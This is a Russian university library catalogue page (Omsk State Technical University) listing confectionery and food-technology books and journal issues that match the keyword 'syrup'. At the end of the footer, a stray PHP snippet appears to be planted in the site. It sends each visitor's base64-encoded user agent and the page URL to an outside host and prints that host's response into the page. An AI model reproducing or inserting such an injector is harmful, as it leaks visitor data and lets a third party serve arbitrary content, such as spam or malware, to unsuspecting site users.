Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

102 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СИРОП")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 22
1. 
Бутейкис, Нина Григорьевна. Технология приготовления мучных кондитерских изделий [Текст] / Н. Г. Бутейкис ; дар. В. В. Арсеньев, 2009. - 300, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о сырье, предназначенном для изготовления хлебобулочных и кондитерских изделий, фаршей, кремов и различных полуфабрикатов, его подготовке и рациональном использовании, а также об изготовлении полуфабрикатов и готовых изделий и их отделке. Рассмотрена технология приготовления разнообразных хлебобулочных и кондитерских изделий, фаршей, кремов и полуфабрикатов, в том числе фирменных изделий из разных видов теста на предприятиях общественного питания.

В 7-е издание внесены изменения и дополнения, касающиеся использования в кондитерском производстве новых видов сырья и технологий новых изделий, по состояниию на 1 апреля 2008 г.

Для учащихся образовательных учреждений начального профессионального образования.

2. 
Десерты и напитки [Текст] / сост. Е. В. Шиш ; дар. В. А. Козлова, 1995. - 490, [1] с.
Держатели документа (Информация об экземплярах) 
3. 
Драгилев, Абрам Иосифович. Основы кондитерского производства [Текст] / А. И. Драгилев, Г. А. Маршалкин ; дар. В. В. Арсеньев, 2007. - 531 с.
Держатели документа (Информация об экземплярах) 

В учебнике рассмотрены технология и оборудование для производства кондитерских изделий. Показана сущность химических и физических процессов и дано их математическое описание, достаточное для использования автоматизированных систем при управлении технологическими процессами. Изложены расчет и пересчет рецептур при замене сырья, а также технологический анализ расхода сырья.

Для студентов вузов, обучающихся по специальности "Технология хлеба, кондитерских и макаронных изделий", "Машины и аппараты пищевых производств".

4. 
Пашук З. Н. Мучные кондитерские изделия [Текст] / З. Н. Пашук, Т. К. Апет, 1997. - 459 с.
Ключевые слова 
ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОИЗВОДСТВО КОНДИТЕРСКОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- МУКА -- КРАХМАЛ -- САХАР -- МЕД -- ПАТОКА -- ЯЙЦА -- МОЛОКО -- МАСЛО -- МАРГАРИН -- ЖИР -- ФРУКТЫ -- ЯГОДЫ -- РАЗРЫХЛИТЕЛЬ ТЕСТА -- ДОБАВКА АРОМАТИЧЕСКАЯ -- ДОБАВКА ВКУСОВАЯ -- ОРЕХИ -- МАК -- ПЕЧЕНЬЕ САХАРНОЕ -- ПЕЧЕНЬЕ ЗАТЯЖНОЕ -- ПЕЧЕНЬЕ СДОБНОЕ -- ГАЛЕТЫ -- КРЕКЕР -- ВЫПЕЧКА ПЕЧЕНЬЯ -- ПРЯНИК -- КЕКС -- БАБА РОМОВАЯ -- ТОРТ -- СИРОП -- ПОМАДА -- КАРАМЕЛЬ -- КАНДИР ДЛЯ САХАРНЫХ ФИГУР -- КРЕМ -- МАРЦИПАН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ - ТРЕБОВАНИЯ САНИТАРНЫЕ -- ПРАВИЛА ЛИЧНОЙ ГИГИЕНЫ -- СРЕДСТВА МОЮЩИЕ -- СРЕДСТВА ДЕЗИНФИЦИРУЮЩИЕ -- ОСМОТР МЕДИЦИНСКИЙ ЕЖЕСМЕННЫЙ -- ЛАМПА БАКТЕРИЦИДНАЯ
Держатели документа (Информация об экземплярах) 
5. 
Четверикова, Ольга Петровна. Сырье и ингредиенты хлебопекарного и кондитерского производства [Текст] / О. П. Четверикова, 2018. - 666 с.
Ключевые слова 
СПРАВОЧНИК -- ПШЕНИЧНАЯ -- МУКА -- РЖАНАЯ -- КРУПА -- ХЛОПЬЯ -- САХАР -- СИРОП -- ПАТОКА -- ГЛЮКОЗА -- ДЕКСТРОЗА -- ФРУКТОЗА -- ЛАКТОЗА -- МЕД -- ЖИР -- МАСЛО -- ВОДА -- ДРОЖЖИ -- ЗАКВАСКА -- МОЛОКО -- ТВОРОГ -- ИЗОЛЯТ -- ЯЙЦО -- КРАХМАЛ -- ПОДСЛАСТИТЕЛЬ -- САХАРОЗАМЕНИТЕЛЬ -- РАЗРЫХЛИТЕЛЬ -- УЛУЧШИТЕЛЬ -- ФЕРМЕНТ -- КЛЕЙКОВИНА -- БЕЛОК -- СОЛЬ -- ЭМУЛЬГАТОР -- АНТИОКСИДАНТ -- ГИДРОКОЛЛОИДЫ -- ПИЩЕВОЕ -- ВОЛОКНО -- КЛЕТЧАТКА -- ФРУКТЫ -- ЯГОДЫ -- СУХОФРУКТЫ -- ЦУКАТЫ -- ОРЕХ -- КУНЖУТ -- СОЛОД -- КАКАО -- КРАСИТЕЛЬ
Держатели документа (Информация об экземплярах) 
6. 
Питание и общество. - Журнал, 2004г. № 12
Оглавление 
  • Константинов, А. Братство по оружию, братство по хлебу / А. Константинов. - с.4-5
  • Евдокимова, Ж. 2004: цены выросли. Но не очень сильно / Ж. Евдокимова. - с.2-3
  • Липин, Сергей. Прости - прощай, год високосный / С. Липин, А. Константинов, А. Сильченко. - с.1, 5-7, 11, 15
  • Юлин, М. "Перепутаница" - стиль нашей власти / М. Юлин. - с.8
  • Третий раз о "нашем" законе. - с.8
  • Можно получить выгодный кредит. Пока что?. - с.9
  • Румянцева, Е. Как разработать бизнес-план? Самоучитель / Е. Румянцева. - с.12-13
  • Кучер, Л. Подготовка зала / Л. Кучер, Л. Шкуратова. - с.14-15
  • Авансовые платежи по аренде. - с.16-17
  • Рецепты московских мастеров. - с.17
  • Мешков, А. В гостях у "Сухаревки" / А. Мешков. - с.18-19
  • Отварной телячий язык с жареными почками. - с.20-21
  • Эвенштейн, З. Сироп. Овощные соки / З. Эвенштейн. - с.22
  • Про мясо. Про крупы и каши. - с.22
  • Кардаков, Н. Приготовила Инна Лоренц / Н. Кардаков. - с.23
  • Лисюк, Г. Подсолнечник повышает ценность изделий / Г. Лисюк, И. Демидов, И. Фомина. - с.24-25
  • Изделия Открытого Чемпионата России по кондитерскому искусству. - с.25
  • Изделия Открытого Чемпионата России по поварскому искусству. - с.26
  • Халиуллин, Ф. Кулинары Казани - тысячелетию родного города / Ф. Халиуллин. - с.26-27
  • Сиденко, К. В Костроме - "праздники вкуса" / К. Сиденко. - с.28
  • "Кулинарный Салон-2004" в Ярославле. - с.28-29
  • Рукавишникова, О. Как живешь, глубинка? / О. Рукавишникова. - с.30-31
  • "Золотая Кулина-2004". - с.32
  • Международная кулинарная Олимпиада "Томск-400". - с.32,
  • Регламент работы с налогоплательщиками. - с.16-17
  • Договор аренды недвижимости. Государственная регистрация. - с.16-17
  • Поводы для медосмотров. - с.16-17
  • Тарифы на электро- и тепловую энергию. - с.16-17
7. 
Библиотечное дело. - Журнал, 2006г. № 12
Оглавление 
  • Бедник, Денис Владимирович. Гламурное уложение среднего класса, или К какому сообществу нам принадлежать? / Д. В. Бедник. - с.2-8
  • Матлина, Слава Григорьевна. Время мнимых величин / С. Г. Матлина. - с.9-11
  • Заболотная, Наталия Анатольевна. Профессия - хоббит, или Жил да был в норе... / Н. А. Заболотная. - с.12-13
  • Прангишвили, Сергей. Современные тенденции оформления книги, или Шаблон, клон и еще тупее / С. Прангишвили. - с.14-17
  • Филиппова, Татьяна. Как бы про жизнь, или Ванильный сироп с подслащенными помоями / Т. Филиппова. - с.18-21
  • Рощин, Данила. "Loxness" антигламура / Д. Рощин. - с.22-23
  • Евсеева, Марина. О "преподавании английского языка детям с помощью образов" / М. Евсеева. - с.24
  • Трушина, Ирина Александровна. Этические антиномии информационного общества / И. А. Трушина. - с.25-28
  • Гусева, Людмила Николаевна. Опыт профессионального чтения / Л. Н. Гусева. - с.30-33
  • Галактионова, Т. "Петербургский проект: чтение и образование" / Т. Галактионова. - с.34
  • Жадько, Наталья Викторовна. И небожители могут ошибаться / Н. В. Жадько. - с.35-36
  • Бородина, В. Национальная программа чтения и библиотечное обслуживание / В. Бородина. - с.37
  • Ялышева, В. Равнение - на книгу / В. Ялышева. - с.38-40
  • Ершов, А. Досадные "мелочи" жизни / А. Ершов. - с.41-42
  • Ермишко, Светлана. Одеть и раздеть женщину / С. Ермишко. - с.43-44
  • Саразетдинов, Рифат Гаясович. Библиотеки - наш стратегический партнер / Р. Г. Саразетдинов. - с.45
Держатели документа (Информация об экземплярах) 
8. 
Пищевая промышленность. - Журнал, 2010г. № 8
Оглавление 
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-май 2010 г.. - с.6-7
  • Колончин, К. В. Научное и образовательное обеспечение продовольственной безопасности Российской Федерации / К. В. Колончин, Д. А. Еделев, А. Ю. Колеснов. - с.8-11
  • Разработка новых рецептур соусов и дрессингов функционального назначения. - с.12-13
  • Тимофеева, К. Г. Биологически активная добавка к пище на основе хитина / К. Г. Тимофеева, Е. Э. Куприна. - с.14-16
  • Шелепина, Н. В. Применение горохового крахмала в производстве концентратов киселей / Н. В. Шелепина. - с.18-19
  • Васнева, И. К. Чечевица - сырье для производства продуктов антистрессовой направленности / И. К. Васнева, О. Е. Бакуменко. - с.20-22
  • Прянишников, В. В. Принципы создания продуктов питания для людей пожилого возраста / В. В. Прянишников, Т. М. Гиро, П. Микляшевски. - с.23
  • Колбасные изделия для геродиетического питания. - с.24-25
  • Болотов, В. М. Черносмородиновый краситель - источник антиоксидантов при производстве кондитерских изделий / В. М. Болотов, П. Н. Саввин. - с.26-27
  • Фруктозо-глюкозный сироп "Одуванчиковый". - с.28-29
  • Крюкова, Е. В. Разработка новых пищевых продуктов с учетом требований потребителей / Е. В. Крюкова, Л. В. Беркетова, Е. Л. Беленко. - с.30-32
  • Козубаева, Л. А. Печенье для безглютенового питания / Л. А. Козубаева, С. С. Кузьмина, М. Н. Вишняк. - с.33
  • Перспективы совершенствования пищеконцентратной отрасли до 2020 г.. - с.34-37
  • Онищенко, Г. Г. О Таможенном союзе / Г. Г. Онищенко. - с.37
  • Драчева, Л. В. Кристаллоскопический метод: функциональные морфотипы и здоровое питание / Л. В. Драчева. - с.38-39
  • Сенсорный контроль качества хлебобулочных изделий. - с.40-42
  • Гаприндашвили, И. Р. Биологически активные вещества плодов унаби / И. Р. Гаприндашвили, В. В. Кутубидзе, Т. Х. Мамулаишвили. - с.43
  • Традиционный вкус любимого майонеза от ГК "Союзснаб". - с.44
  • Губина, М. Д. Замороженные ягоды как стратегический запас для переработки в межсезонный период / М. Д. Губина, Н. А. Лучина. - с.46-47
  • Спицын, А. Поддержание качества продукта / А. Спицын. - с.47
  • Преснякова, О. П. Винодельческие предприятия и вина Тосканы / О. П. Преснякова, Е. Кушнерева. - с.48-50
  • [Новости НИИ и вузов]. - с.51
  • [Новости отраслевых союзов]. - с.52-53
  • [Новости компаний]. - с.54-55
  • AVERS представляет. - с.56-57
  • Азрилевич, М. Р. IX Международный Сахарный Форум / М. Р. Азрилевич. - с.58-59
  • Бурдун, Н. И. Стратегические решения для российской индустрии упаковки / Н. И. Бурдун. - с.60-61
  • Программа "Российское качество" в действии. - с.61
  • Бавария - надежный и перспективный партнер России. - с.62-63
  • Конференция кондитеров России, Казахстана и Белоруссии. - с.63
  • Егоров, Ю. Н. "Студент хочет есть быстро, вкусно и без последствий! " / Ю. Н. Егоров. - с.65
9. 
Библиотечное дело. - Журнал, 2006г. № 12
Оглавление 
  • Бедник, Денис Владимирович. Гламурное уложение среднего класса, или К какому сообществу нам принадлежать? / Д. В. Бедник. - с.2-8
  • Матлина, Слава Григорьевна. Время мнимых величин / С. Г. Матлина. - с.9-11
  • Заболотная, Наталия Анатольевна. Профессия - хоббит, или Жил да был в норе... / Н. А. Заболотная. - с.12-13
  • Прангишвили, Сергей. Современные тенденции оформления книги, или Шаблон, клон и еще тупее / С. Прангишвили. - с.14-17
  • Филиппова, Татьяна. Как бы про жизнь, или Ванильный сироп с подслащенными помоями / Т. Филиппова. - с.18-21
  • Рощин, Данила. "Loxness" антигламура / Д. Рощин. - с.22-23
  • Евсеева, Марина. О "преподавании английского языка детям с помощью образов" / М. Евсеева. - с.24
  • Трушина, Ирина Александровна. Этические антиномии информационного общества / И. А. Трушина. - с.25-28
  • Гусева, Людмила Николаевна. Опыт профессионального чтения / Л. Н. Гусева. - с.30-33
  • Галактионова, Т. "Петербургский проект: чтение и образование" / Т. Галактионова. - с.34
  • Жадько, Наталья Викторовна. И небожители могут ошибаться / Н. В. Жадько. - с.35-36
  • Бородина, В. Национальная программа чтения и библиотечное обслуживание / В. Бородина. - с.37
  • Ялышева, В. Равнение - на книгу / В. Ялышева. - с.38-40
  • Ершов, А. Досадные "мелочи" жизни / А. Ершов. - с.41-42
  • Ермишко, Светлана. Одеть и раздеть женщину / С. Ермишко. - с.43-44
  • Саразетдинов, Рифат Гаясович. Библиотеки - наш стратегический партнер / Р. Г. Саразетдинов. - с.45
Держатели документа (Информация об экземплярах) 
10. 
Старцев И. А. Молочная кухня и питание детей [Текст] / И. А. Старцев, В. Д. Отт, 1975. - 256 с.
Держатели документа (Информация об экземплярах) 
11. 
Бурчакова И. Ю. Организация процесса приготовления и приготовление сложных хлебобулочных, мучных кондитерских изделий [Текст] / И. Ю. Бурчакова, С. В. Ермилова, 2014. - 384 с. : [8] вкл. цв. л. с.
Ключевые слова 
ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- МИНИ - ПЕКАРНЯ -- ОБОРУДОВАНИЕ МЕХАНИЧЕСКОЕ -- ОБОРУДОВАНИЕ СОРТИРОВОЧНО - КАЛИБРОВОЧНОЕ -- ОБОРУДОВАНИЕ МОЕЧНОЕ -- ОБОРУДОВАНИЕ МЕСИЛЬНО - ПЕРЕМЕШИВАЮЩЕЕ -- ОБОРУДОВАНИЕ ДОЗИРОВОЧНО - ФОРМОВОЧНОЕ -- ОБОРУДОВАНИЕ ИЗМЕЛЬЧИТЕЛЬНО-РЕЖУЩЕЕ -- ОБОРУДОВАНИЕ РАЗБРЫЗГИВАЮЩЕЕ -- ОБОРУДОВАНИЕ СПЕЦИАЛЬНОЕ -- ОБОРУДОВАНИЕ УПАКОВОЧНОЕ -- ОБОРУДОВАНИЕ ТЕПЛОВОЕ -- ОБОРУДОВАНИЕ ВАРОЧНОЕ -- ОБОРУДОВАНИЕ ДЛЯ РАССТОЙКИ ТЕСТОВЫХ ЗАГОТОВОК -- ОБОРУДОВАНИЕ ЖАРОЧНОЕ -- ПЛИТА -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ТРЕБОВАНИЯ САНИТАРНЫЕ -- КОНТРОЛЬ КАЧЕСТВА КОНДИТЕРСКИХ ИЗДЕЛИЙ -- СЫРЬЕ КОНДИТЕРСКОЕ -- ВЗАИМОЗАМЕНЯЕМОСТЬ СЫРЬЯ -- ПОЛУФАБРИКАТЫ КОНДИТЕРСКИЕ -- СИРОП -- ПОМАДА -- ЖЕЛЕ -- ГЛАЗУРЬ КОНДИТЕРСКАЯ -- КРЕМ -- МУСС -- КАРАМЕЛЬ -- МАРЦИПАН -- МАСТИКА САХАРНАЯ -- ПРАЛИНЕ -- ПОСЫПКА КОНДИТЕРСКАЯ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ СЛОЖНЫЕ -- ХЛЕБ ПРАЗДНИЧНЫЙ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ СЛОЖНЫЕ -- ПОЛУФАБРИКАТЫ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ПРЯНИЧНЫЕ -- ТОРТЫ -- КАЧЕСТВО КОНДИТЕРСКИХ ИЗДЕЛИЙ -- ХРАНЕНИЕ КОНДИТЕРСКИХ ИЗДЕЛИЙ -- МЕРА - МАССА
Держатели документа (Информация об экземплярах) 
12. 
Мазепа Е. В. Практикум для кондитера [Текст] : Учеб. пособие / Е. В. Мазепа, 2002. - 372,[2] с.
Держатели документа (Информация об экземплярах) 
13. 
Кулькова Л. В. Приготовление коктейлей и других смешанных напитков [Текст] : Учеб. пособие / Л. В. Кулькова, 2002. - 376 с.
14. 
Коробкина, Зоя Васильевна. Товароведение и экспертиза вкусовых товаров [Текст] : Учебник гриф-МО / З. В. Коробкина, С. А. Страхова, 2003. - 352 с.
15. 
Драгилев, Абрам Иосифович. Основы кондитерского производства [Текст] : Учеб. для вузов по специальностям "Технология хлеба, кондит. и макарон. изделий", "Машины и аппараты пищевых пр-в" / А. И. Драгилев, Г. А. Маршалкин, 1999. - 447 с.
16. 
Михайлова М. С. Товароведение вкусовых товаров для официантов, барменов [Текст] : Учеб. пособие для студ. образоват. учреждений сред. проф. образования / М. С. Михайлова, 2002. - 255 с.
Держатели документа (Информация об экземплярах) 
17. 
Барановский В. А. Кондитер [Текст] : Учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Т. И. Перетятко, 2003. - 381 с.
Держатели документа (Информация об экземплярах) 
18. 
Производство хлеба, хлебобулочных и кондитерских изделий. Торты и пирожные [Текст] / сост. В. А. Шипов, 1999. - 286 с.
Держатели документа (Информация об экземплярах) 
19. 
Барановский В. А. Кондитер [Текст] : учеб. пособие для уч-ся колледжей и сред. проф.-тех. училищ / В. А. Барановский, 2000. - 318 с.
Держатели документа (Информация об экземплярах) 
20. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 
21. 
Кенгис, Роберт Петрович. Изделия из теста [Текст] / Р. П. Кенгис, 1958. - 192 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2996 - 23.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.01 с.20 запросов, 0.55c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;